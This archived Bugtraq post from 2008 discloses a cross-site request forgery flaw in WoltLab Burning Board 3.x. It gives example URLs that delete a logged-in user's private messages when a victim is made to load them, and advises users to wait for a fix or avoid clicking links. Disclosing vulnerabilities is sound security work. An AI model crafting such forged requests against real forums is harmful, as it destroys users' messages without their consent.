WoltLab Burning Board 3.x.x Private Message Delete XSRF Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: WoltLab Burning Board 3.x.x Private Message Delete XSRF Vulnerability
From: nbbn@xxxxxxx
Date: Sun, 27 Jan 2008 00:23:28 +0100
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
User-agent: KMail/1.9.7

#############################################################################
WoltLab Burning Board 3.x.x PM Delete Cross-Site Request Forgery Vulnerability
by NBBN.         Founded: 25 December 2007
#############################################################################


Examples:
http://domain.tld/wbb3/index.php?page=PM&amp;action=delete&amp;pmID=[pmid]
http://domain.tld/wbb3/index.php?page=PM&amp;action=delete&amp;pmID=1

Fix: 

Wait for a fix. Or never surf in other sites, if you have autologin on and 
don't click links, when you are logged in. 

Vulnerability Versions:

I tested it only on 3.0.1 but I think that all version of 3 are vuln.

Prev by Date: ASPired2Protect bypass
Next by Date: CORE-2007-1219: Firebird Remote Memory Corruption
Previous by thread: ASPired2Protect bypass
Next by thread: CORE-2007-1219: Firebird Remote Memory Corruption
Index(es):
- Date
- Thread